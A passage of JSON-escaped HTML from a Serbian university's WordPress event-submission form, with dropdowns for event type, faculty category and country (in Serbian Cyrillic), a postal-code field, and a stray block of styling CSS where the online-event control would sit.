value=\"79\">&nbsp;&nbsp;&nbsp;Promotional event<\/option>\n\t<option class=\"level-0\" value=\"58\">Party or Social Gathering<\/option>\n\t<option class=\"level-0\" value=\"59\">Race or Endurance Event<\/option>\n\t<option class=\"level-0\" value=\"60\">Rally<\/option>\n\t<option class=\"level-0\" value=\"61\">Screening<\/option>\n\t<option class=\"level-0\" value=\"62\">Seminar or Talk<\/option>\n\t<option class=\"level-0\" value=\"63\">Tour<\/option>\n\t<option class=\"level-0\" value=\"64\">Tournament<\/option>\n\t<option class=\"level-0\" value=\"65\">Tradeshow, Consumer Show or Expo<\/option>\n<\/select>\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_category\">\r\n\t\t\t\t<label for=\"event_category\">\r\n\t\t\t\t\t\u041a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0458\u0430 \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<select  name='event_category' id='event_category' class='postform'>\n\t<option value='0'>Choose a Category<\/option>\n\t<option class=\"level-0\" value=\"113\">Faculty of Economics<\/option>\n\t<option class=\"level-0\" value=\"107\">Medical Faculty<\/option>\n\t<option class=\"level-0\" value=\"111\">Faculty of Agriculture<\/option>\n\t<option class=\"level-0\" value=\"105\">Faculty of Law<\/option>\n\t<option class=\"level-0\" value=\"110\">Faculty of Natural Sciences<\/option>\n\t<option class=\"level-0\" value=\"103\">\u0423\u0434\u0440\u0443\u0436\u0435\u045a\u0435 \u0430\u043b\u0443\u043c\u043d\u0438\u0441\u0442\u0430<\/option>\n\t<option class=\"level-0\" value=\"108\">Faculty of Pedagogy<\/option>\n\t<option class=\"level-0\" value=\"112\">Faculty of Sports and Physical Education<\/option>\n\t<option class=\"level-0\" value=\"104\">Faculty of Technical Sciences<\/option>\n\t<option class=\"level-0\" value=\"109\">Faculty of art<\/option>\n\t<option class=\"level-0\" value=\"106\">\u0424\u0438\u043b\u043e\u0437\u043e\u0444\u0441\u043a\u0438 \u0444\u0430\u043a\u0443\u043b\u0442\u0435\u0442<\/option>\n<\/select>\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_online\">\r\n\t\t\t\t<label for=\"event_online\">\r\n\t\t\t\t\t\u041e\u043d\u043b\u0430\u0458\u043d \u0434\u043e\u0433\u0430\u0452\u0430\u0458<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t.vc_settings-tab-content {\n  .deprecated {\n    background-color: rgb(255, 255, 224);\n    border-bottom-color: rgb(230, 219, 85);\n    border-bottom-left-radius: 3px;\n    border-bottom-right-radius: 3px;\n    border-bottom-style: solid;\n    border-bottom-width: 1px;\n    border-left-color: rgb(230, 219, 85);\n    border-left-style: solid;\n    border-left-width: 1px;\n    border-right-color: rgb(230, 219, 85);\n    border-right-style: solid;\n    border-right-width: 1px;\n    border-top-color: rgb(230, 219, 85);\n    border-top-left-radius: 3px;\n    border-top-right-radius: 3px;\n    border-top-style: solid;\n    border-top-width: 1px;\n    color: rgb(51, 51, 51);\n    display: block;\n    font-family: sans-serif;\n    font-size: 12px;\n    line-height: 16.796875px;\n    margin-bottom: 15px;\n    margin-left: 0px;\n    margin-right: 0px;\n    margin-top: 15px;\n    outline-color: rgb(51, 51, 51);\n    outline-style: none;\n    outline-width: 0px;\n    padding-bottom: 0px;\n    padding-left: 7.1875px;\n    padding-right: 7.1875px;\n    padding-top: 0px;\n  }\n  .vc_show_example {\n    cursor: pointer;\n  }\n}\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_pincode\">\r\n\t\t\t\t<label for=\"event_pincode\">\r\n\t\t\t\t\tPostal code<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<input type=\"text\" class=\"input-text event_pincode\" name=\"event_pincode\" id=\"event_pincode\" placeholder=\"\u0423\u043d\u0435\u0441\u0438\u0442\u0435 \u043f\u043e\u0448\u0442\u0430\u043d\u0441\u043a\u0438 \u0431\u0440\u043e\u0458\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_country\">\r\n\t\t\t\t<label for=\"event_country\">\r\n\t\t\t\t\t\u0417\u0435\u043c\u0459\u0430 \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<select name=\"event_country\" id=\"event_country\" required attribute=\"\">\r\n\r\n\t\t\t<option value=\"\"  selected='selected'>\u0418\u0437\u0430\u0431\u0435\u0440\u0438\u0442\u0435 \u0437\u0435\u043c\u0459\u0443<\/option>\r\n\t\t\t<option value=\"af\" >\u0410\u0444\u0433\u0430\u043d\u0438\u0441\u0430\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"ax\" >\u0410\u043b\u0430\u043d\u0434\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"al\" >\u0410\u043b\u0431\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"dz\" >\u0410\u043b\u0436\u0438\u0440<\/option>\r\n\t\t\t<option value=\"as\" >\u0410\u043c\u0435\u0440\u0438\u0447\u043a\u0430 \u0421\u0430\u043c\u043e\u0430<\/option>\r\n\t\t\t<option value=\"ad\" >\u0410\u043d\u0434\u043e\u0440\u0430<\/option>\r\n\t\t\t<option value=\"ao\" >\u0410\u043d\u0433\u043e\u043b\u0430<\/option>\r\n\t\t\t<option value=\"ai\" >\u0410\u043d\u0433\u0438\u043b\u0430<\/option>\r\n\t\t\t<option value=\"aq\" >\u0410\u043d\u0442\u0430\u0440\u0442\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ag\" >\u0410\u043d\u0442\u0438\u0433\u0443\u0430 \u0438 \u0411\u0430\u0440\u0431\u0443\u0434\u0430<\/option>\r\n\t\t\t<option value=\"ar\" >\u0410\u0440\u0433\u0435\u043d\u0442\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"am\" >\u0408\u0435\u0440\u043c\u0435\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"aw\" >\u0410\u0440\u0443\u0431\u0430<\/option>\r\n\t\t\t<option value=\"au\" >\u0410\u0443\u0441\u0442\u0440\u0430\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"at\" >\u0410\u0443\u0441\u0442\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"az\" >\u0410\u0437\u0435\u0440\u0431\u0435\u0458\u045f\u0430\u043d<\/option>\r\n\t\t\t<option value=\"bs\" >\u0411\u0430\u0445\u0430\u043c\u0438<\/option>\r\n\t\t\t<option value=\"bh\" >\u0411\u0430\u0445\u0440\u0435\u0438\u043d<\/option>\r\n\t\t\t<option value=\"bd\" >\u0411\u0430\u043d\u0433\u043b\u0430\u0434\u0435\u0448<\/option>\r\n\t\t\t<option value=\"bb\" >\u0411\u0430\u0440\u0431\u0430\u0434\u043e\u0441<\/option>\r\n\t\t\t<option value=\"by\" >\u0411\u0435\u043b\u043e\u0440\u0443\u0441\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"be\" >\u0411\u0435\u043b\u0433\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"bz\" >\u0411\u0435\u043b\u0438\u0437\u0435<\/option>\r\n\t\t\t<option value=\"bj\" >\u0411\u0435\u043d\u0438\u043d<\/option>\r\n\t\t\t<option value=\"bm\" >\u0411\u0435\u0440\u043c\u0443\u0434\u0430<\/option>\r\n\t\t\t<option value=\"bt\" >\u0411\u0443\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"bo\" >\u0411\u043e\u043b\u0438\u0432\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ba\" >\u0411\u043e\u0441\u043d\u0430 \u0438 \u0425\u0435\u0440\u0446\u0435\u0433\u043e\u0432\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"bw\" >\u0411\u043e\u0446\u0432\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"bv\" >\u0411\u0443\u0432\u0435\u0442\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"br\" >\u0411\u0440\u0430\u0437\u0438\u043b<\/option>\r\n\t\t\t<option value=\"io\" >\u0411\u0440\u0438\u0442\u0430\u043d\u0441\u043a\u0430 \u0418\u043d\u0434\u0438\u0458\u0441\u043a\u0430 \u041f\u043e\u043c\u043e\u0440\u0441\u043a\u0430 \u0422\u0435\u0440\u0438\u0442\u043e\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"bn\" >\u0411\u0440\u0443\u043d\u0435\u0458 \u0414\u0430\u0440\u0443\u0441\u0430\u043b\u0430\u043c<\/option>\r\n\t\t\t<option value=\"bg\" >\u0411\u0443\u0433\u0430\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"bf\" >\u0411\u0443\u0440\u043a\u0438\u043d\u0430 \u0424\u0430\u0441\u043e<\/option>\r\n\t\t\t<option value=\"bi\" >\u0411\u0443\u0440\u0443\u043d\u0434\u0438<\/option>\r\n\t\t\t<option value=\"kh\" >\u041a\u0430\u043c\u0431\u043e\u045f\u0430<\/option>\r\n\t\t\t<option value=\"cm\" >\u041a\u0430\u043c\u0435\u0440\u0443\u043d<\/option>\r\n\t\t\t<option value=\"ca\" >\u041a\u0430\u043d\u0430\u0434\u0430<\/option>\r\n\t\t\t<option value=\"cv\" >\u041a\u0430\u043f\u0435 \u0412\u0435\u0440\u0434\u0435<\/option>\r\n\t\t\t<option value=\"ky\" >\u041a\u0430\u0458\u043c\u0430\u043d\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"cf\" >\u0426\u0435\u043d\u0442\u0440\u0430\u043b\u043d\u043e\u0430\u0444\u0440\u0438\u0447\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"td\" >\u0427\u0430\u0434<\/option>\r\n\t\t\t<option value=\"cl\" >\u0427\u0438\u043b\u0435<\/option>\r\n\t\t\t<option value=\"cn\" >\u041a\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"cx\" >\u0411\u043e\u0436\u0438\u045b\u043d\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"cc\" >\u041a\u043e\u043a\u043e\u0441 (\u041a\u0438\u043b\u0438\u043d\u0433\u043e\u0432\u0430) \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"co\" >\u041a\u043e\u043b\u0443\u043c\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"km\" >\u041a\u043e\u043c\u043e\u0440\u0438<\/option>\r\n\t\t\t<option value=\"cg\" >\u041a\u043e\u043d\u0433\u043e<\/option>\r\n\t\t\t<option value=\"cd\" >\u0414\u0435\u043c\u043e\u043a\u0440\u0430\u0442\u0441\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430 \u041a\u043e\u043d\u0433\u043e<\/option>\r\n\t\t\t<option value=\"ck\" >\u041a\u0443\u043a\u043e\u0432\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"cr\" >\u041a\u043e\u0441\u0442\u0430 \u0420\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ci\" >\u041e\u0431\u0430\u043b\u0430 \u0421\u043b\u043e\u043d\u043e\u0432\u0430\u0447\u0435<\/option>\r\n\t\t\t<option value=\"hr\" >\u0425\u0440\u0432\u0430\u0442\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"cu\" >\u041a\u0443\u0432\u0430<\/option>\r\n\t\t\t<option value=\"cy\" >\u041a\u0438\u043f\u0430\u0440<\/option>\r\n\t\t\t<option value=\"cz\" >\u0427\u0435\u0448\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"dk\" >\u0414\u0430\u043d\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"dj\" >\u040f\u0438\u0431\u0443\u0442\u0438<\/option>\r\n\t\t\t<option value=\"dm\" >\u0414\u043e\u043c\u0438\u043d\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"do\" >\u0414\u043e\u043c\u0438\u043d\u0438\u043a\u0430\u043d\u0441\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ec\" >\u0415\u043a\u0432\u0430\u0434\u043e\u0440<\/option>\r\n\t\t\t<option value=\"eg\" >\u0415\u0433\u0438\u043f\u0430\u0442<\/option>\r\n\t\t\t<option value=\"sv\" >\u0415\u043b \u0421\u0430\u043b\u0432\u0430\u0434\u043e\u0440<\/option>\r\n\t\t\t<option value=\"gq\" >\u0415\u043a\u0432\u0430\u0442\u043e\u0440\u0438\u0458\u0430\u043b\u043d\u0430 \u0413\u0432\u0438\u043d\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"er\" >\u0415\u0440\u0438\u0442\u0440\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ee\" >\u0415\u0441\u0442\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"et\" >\u0415\u0442\u0438\u043e\u043f\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"fk\" >\u0424\u043e\u043b\u043a\u043b\u0430\u043d\u0434\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"fo\" >\u0424\u0430\u0440\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"fj\" >\u0424\u0438\u045f\u0438<\/option>\r\n\t\t\t<option value=\"fi\" >\u0424\u0438\u043d\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"fr\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gf\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0430 \u0413\u0438\u0458\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"pf\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0430 \u041f\u043e\u043b\u0438\u043d\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"tf\" >\u0424\u0440\u0430\u043d\u0446\u0443\u0441\u043a\u0435 \u0408\u0443\u0441\u0436\u043d\u0435 \u0422\u0435\u0440\u0438\u0442\u043e\u0440\u0438\u0458\u0435<\/option>\r\n\t\t\t<option value=\"ga\" >\u0413\u0430\u0431\u043e\u043d<\/option>\r\n\t\t\t<option value=\"gm\" >\u0413\u0430\u043c\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ge\" >\u0413\u0440\u0443\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"de\" >\u041d\u0435\u043c\u0430\u0447\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gh\" >\u0413\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"gi\" >\u0413\u0438\u0431\u0440\u0430\u043b\u0442\u0430\u0440<\/option>\r\n\t\t\t<option value=\"gr\" >\u0413\u0440\u0447\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gl\" >\u0413\u0440\u0435\u043d\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"gd\" >\u0413\u0440\u0435\u043d\u0430\u0434\u0430<\/option>\r\n\t\t\t<option value=\"gp\" >\u0413\u0432\u0430\u0434\u0430\u043b\u0443\u043f\u0435<\/option>\r\n\t\t\t<option value=\"gu\" >\u0413\u0443\u0430\u043c<\/option>\r\n\t\t\t<option value=\"gt\" >\u0413\u0432\u0430\u0442\u0435\u043c\u0430\u043b\u0430<\/option>\r\n\t\t\t<option value=\"gg\" >\u0413\u0435\u0440\u043d\u0437\u0438<\/option>\r\n\t\t\t<option value=\"gn\" >\u0413\u0432\u0438\u043d\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"gw\" >\u0413\u0432\u0438\u043d\u0435\u0458\u0430-\u0411\u0438\u0441\u0430\u0443<\/option>\r\n\t\t\t<option value=\"gy\" >\u0413\u0438\u0458\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"ht\" >\u0425\u0430\u0438\u0442\u0438<\/option>\r\n\t\t\t<option value=\"hm\" >\u041e\u0441\u0442\u0440\u0432\u043e \u0425\u0435\u0440\u0434 \u0438 \u043e\u0441\u0442\u0440\u0432\u0430 \u041c\u0430\u043a\u0434\u043e\u043d\u0430\u043b\u0434<\/option>\r\n\t\t\t<option value=\"va\" >\u0412\u0430\u0442\u0438\u043a\u0430\u043d<\/option>\r\n\t\t\t<option value=\"hn\" >\u0425\u043e\u043d\u0434\u0443\u0440\u0430\u0441<\/option>\r\n\t\t\t<option value=\"hk\" >\u0425\u043e\u043d\u0433 \u041a\u043e\u043d\u0433<\/option>\r\n\t\t\t<option value=\"hu\" >\u041c\u0430\u0452\u0430\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"is\" >\u0418\u0441\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"in\" >\u0418\u043d\u0434\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"id\" >\u0418\u043d\u0434\u043e\u043d\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ir\" >\u0418\u0440\u0430\u043d<\/option>\r\n\t\t\t<option value=\"iq\" >\u0418\u0440\u0430\u043a<\/option>\r\n\t\t\t<option value=\"ie\" >\u0418\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"im\" >\u041e\u0441\u0442\u0440\u0432\u043e \u041c\u0430\u043d<\/option>\r\n\t\t\t<option value=\"il\" >\u0418\u0437\u0440\u0430\u0435\u043b<\/option>\r\n\t\t\t<option value=\"it\" >\u0418\u0442\u0430\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"jm\" >\u0408\u0430\u043c\u0430\u0458\u043a\u0430<\/option>\r\n\t\t\t<option value=\"jp\" >\u0408\u0430\u043f\u0430\u043d<\/option>\r\n\t\t\t<option value=\"je\" >\u040f\u0435\u0440\u0441\u0438<\/option>\r\n\t\t\t<option value=\"jo\" >\u0408\u043e\u0440\u0434\u0430\u043d<\/option>\r\n\t\t\t<option value=\"kz\" >\u041a\u0430\u0437\u0430\u0445\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"ke\" >\u041a\u0435\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ki\" >\u041a\u0438\u0440\u0438\u0431\u0430\u0442\u0438<\/option>\r\n\t\t\t<option value=\"kr\" >\u041a\u043e\u0440\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"kw\" >\u041a\u0443\u0432\u0430\u0458\u0442<\/option>\r\n\t\t\t<option value=\"kg\" >\u041a\u0438\u0440\u0433\u0438\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"la\" >\u041b\u0430\u043e\u0441<\/option>\r\n\t\t\t<option value=\"lv\" >\u041b\u0435\u0442\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"lb\" >\u041b\u0438\u0431\u0430\u043d<\/option>\r\n\t\t\t<option value=\"ls\" >\u041b\u0435\u0441\u043e\u0442\u043e<\/option>\r\n\t\t\t<option value=\"lr\" >\u041b\u0438\u0431\u0435\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ly\" >\u041b\u0438\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"li\" >\u041b\u0438\u0445\u0442\u0435\u043d\u0448\u0442\u0430\u0458\u043d<\/option>\r\n\t\t\t<option value=\"lt\" >\u041b\u0438\u0442\u0432\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"lu\" >\u041b\u0443\u043a\u0441\u0435\u043c\u0431\u0443\u0440\u0433<\/option>\r\n\t\t\t<option value=\"mo\" >\u041c\u0430\u043a\u0430\u043e<\/option>\r\n\t\t\t<option value=\"mk\" >\u0421\u0435\u0432\u0435\u0440\u043d\u0430 \u041c\u0430\u043a\u0435\u0434\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mg\" >\u041c\u0430\u0434\u0430\u0433\u0430\u0441\u043a\u0430\u0440<\/option>\r\n\t\t\t<option value=\"mw\" >\u041c\u0430\u043b\u0430\u0432\u0438<\/option>\r\n\t\t\t<option value=\"my\" >\u041c\u0430\u043b\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mv\" >\u041c\u0430\u043b\u0434\u0438\u0432\u0438<\/option>\r\n\t\t\t<option value=\"ml\" >\u041c\u0430\u043b\u0438<\/option>\r\n\t\t\t<option value=\"mt\" >\u041c\u0430\u043b\u0442\u0430<\/option>\r\n\t\t\t<option value=\"mh\" >\u041c\u0430\u0440\u0448\u0430\u043b\u043e\u0432\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"mq\" >\u041c\u0430\u0440\u0442\u0438\u043d\u0438\u043a<\/option>\r\n\t\t\t<option value=\"mr\" >\u041c\u0430\u0443\u0440\u0438\u0442\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mu\" >\u041c\u0430\u0443\u0440\u0438\u0446\u0438\u0458\u0443\u0441<\/option>\r\n\t\t\t<option value=\"yt\" >\u041c\u0430\u0458\u043e\u0442<\/option>\r\n\t\t\t<option value=\"mx\" >\u041c\u0435\u043a\u0441\u0438\u043a\u043e<\/option>\r\n\t\t\t<option value=\"fm\" >\u041c\u0438\u043a\u0440\u043e\u043d\u0435\u0437\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"md\" >\u041c\u043e\u043b\u0434\u0430\u0432\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mc\" >\u041c\u043e\u043d\u0430\u043a\u043e<\/option>\r\n\t\t\t<option value=\"mn\" >\u041c\u043e\u043d\u0433\u043e\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"me\" >\u0426\u0440\u043d\u0430 \u0413\u043e\u0440\u0430<\/option>\r\n\t\t\t<option value=\"ms\" >\u041c\u043e\u043d\u0441\u0435\u0440\u0430\u0442<\/option>\r\n\t\t\t<option value=\"ma\" >\u041c\u0430\u0440\u043e\u043a\u043e<\/option>\r\n\t\t\t<option value=\"mz\" >\u041c\u043e\u0437\u0430\u043c\u0431\u0438\u043a<\/option>\r\n\t\t\t<option value=\"mm\" >\u041c\u0438\u0458\u0430\u043d\u043c\u0430\u0440<\/option>\r\n\t\t\t<option value=\"na\" >\u041d\u0430\u043c\u0438\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"nr\" >\u041d\u0430\u0443\u0440\u0443<\/option>\r\n\t\t\t<option value=\"np\" >\u041d\u0435\u043f\u0430\u043b<\/option>\r\n\t\t\t<option value=\"nl\" >\u0425\u043e\u043b\u0430\u043d\u0434\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"an\" >\u0425\u043e\u043d\u0430\u043b\u0434\u0441\u043a\u0438 \u0410\u043d\u0442\u0438\u043b\u0438<\/option>\r\n\t\t\t<option value=\"nc\" >\u041d\u043e\u0432\u0430 \u041a\u0430\u043b\u0435\u0434\u043e\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"nz\" >\u041d\u043e\u0432\u0438 \u0417\u0435\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"ni\" >\u041d\u0438\u043a\u0430\u0440\u0430\u0433\u0432\u0430<\/option>\r\n\t\t\t<option value=\"ne\" >\u041d\u0438\u0433\u0435\u0440<\/option>\r\n\t\t\t<option value=\"ng\" >\u041d\u0438\u0433\u0435\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"nu\" >\u041d\u0438\u0458\u0443\u0435<\/option>\r\n\t\t\t<option value=\"nf\" >\u041d\u043e\u0440\u0444\u043e\u043b\u043a<\/option>\r\n\t\t\t<option value=\"mp\" >\u041e\u0441\u0442\u0440\u0432\u0430 \u0421\u0435\u0432\u0435\u0440\u043d\u0430 \u041c\u0430\u0440\u0438\u0458\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"no\" >\u041d\u043e\u0440\u0432\u0435\u0448\u043a\u0430<\/option>\r\n\t\t\t<option value=\"om\" >\u041e\u043c\u0430\u043d<\/option>\r\n\t\t\t<option value=\"pk\" >\u041f\u0430\u043a\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"pw\" >\u041f\u0430\u043b\u0430\u0443<\/option>\r\n\t\t\t<option value=\"ps\" >\u041f\u0430\u043b\u0435\u0441\u0442\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"pa\" >\u041f\u0430\u043d\u0430\u043c\u0430<\/option>\r\n\t\t\t<option value=\"pg\" >\u041f\u0430\u043f\u0443\u0430 \u041d\u043e\u0432\u0430 \u0413\u0432\u0438\u043d\u0435\u0458\u0430<\/option>\r\n\t\t\t<option value=\"py\" >\u041f\u0430\u0440\u0430\u0433\u0432\u0430\u0458<\/option>\r\n\t\t\t<option value=\"pe\" >\u041f\u0435\u0440\u0443<\/option>\r\n\t\t\t<option value=\"ph\" >\u0424\u0438\u043b\u0438\u043f\u0438\u043d\u0438<\/option>\r\n\t\t\t<option value=\"pn\" >\u041f\u0438\u0442\u043a\u0435\u0440\u043d<\/option>\r\n\t\t\t<option value=\"pl\" >\u041f\u043e\u0459\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"pt\" >\u041f\u043e\u0440\u0442\u0443\u0433\u0430\u043b<\/option>\r\n\t\t\t<option value=\"pr\" >\u041f\u043e\u0440\u0442\u043e \u0420\u0438\u043a\u043e<\/option>\r\n\t\t\t<option value=\"qa\" >\u041a\u0430\u0442\u0430\u0440<\/option>\r\n\t\t\t<option value=\"re\" >\u0420\u0435\u0443\u043d\u0438\u043e\u043d<\/option>\r\n\t\t\t<option value=\"ro\" >\u0420\u0443\u043c\u0443\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ru\" >\u0420\u0443\u0441\u043a\u0430 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"rw\" >\u0420\u0443\u0430\u043d\u0434\u0430<\/option>\r\n\t\t\t<option value=\"bl\" >\u0421\u0435\u043d \u0411\u0430\u0440\u0442\u0435\u043b\u0435\u043c\u0438<\/option>\r\n\t\t\t<option value=\"sh\" >\u0421\u0432\u0435\u0442\u0430 \u0425\u0435\u043b\u0435\u043d\u0430<\/option>\r\n\t\t\t<option value=\"kn\" >\u0412\u0435\u0442\u0438 \u041a\u0438\u0442\u0438\u0441 \u0438 \u041d\u0435\u0432\u0438\u0441<\/option>\r\n\t\t\t<option value=\"lc\" >\u0421\u0430\u043d\u0442\u0430 \u041b\u0443\u0446\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"mf\" >\u0421\u0435\u043d\u0442 \u041c\u0430\u0440\u0442\u0435\u043d<\/option>\r\n\t\t\t<option value=\"pm\" >\u0421\u0435\u043d \u041f\u0458\u0435\u0440 \u0438 \u041c\u0438\u043a\u0435\u043b\u043e\u043d<\/option>\r\n\t\t\t<option value=\"vc\" >\u0421\u0435\u043d\u0442 \u0412\u0438\u043d\u0441\u0435\u043d\u0442 \u0438 \u0413\u0440\u0435\u043d\u0430\u0434\u0438\u043d\u0438<\/option>\r\n\t\t\t<option value=\"ws\" >\u0421\u0430\u043c\u043e\u0430<\/option>\r\n\t\t\t<option value=\"sm\" >\u0421\u0430\u043d \u041c\u0430\u0440\u0438\u043e\u043d\u043e<\/option>\r\n\t\t\t<option value=\"st\" >\u0421\u0430\u043e \u0422\u043e\u043c\u0435 \u0438 \u041f\u0440\u0438\u043d\u0446\u0438\u043f\u0435<\/option>\r\n\t\t\t<option value=\"sa\" >\u0421\u0430\u0443\u0434\u0438\u0458\u0441\u043a\u0430 \u0410\u0440\u0430\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"sn\" >\u0421\u0435\u043d\u0435\u0433\u0430\u043b<\/option>\r\n\t\t\t<option value=\"rs\" >Serbia<\/option>\r\n\t\t\t<option value=\"sc\" >\u0421\u0435\u0458\u0448\u0435\u043b\u0438<\/option>\r\n\t\t\t<option value=\"sl\" >\u0421\u0438\u0435\u0440\u0430 \u041b\u0435\u043e\u043d\u0435<\/option>\r\n\t\t\t<option value=\"sg\" >\u0421\u0438\u043d\u0433\u0430\u043f\u0443\u0440<\/option>\r\n\t\t\t<option value=\"sk\" >\u0421\u043b\u043e\u0432\u0430\u0447\u043a\u0430<\/option>\r\n\t\t\t<option value=\"si\" 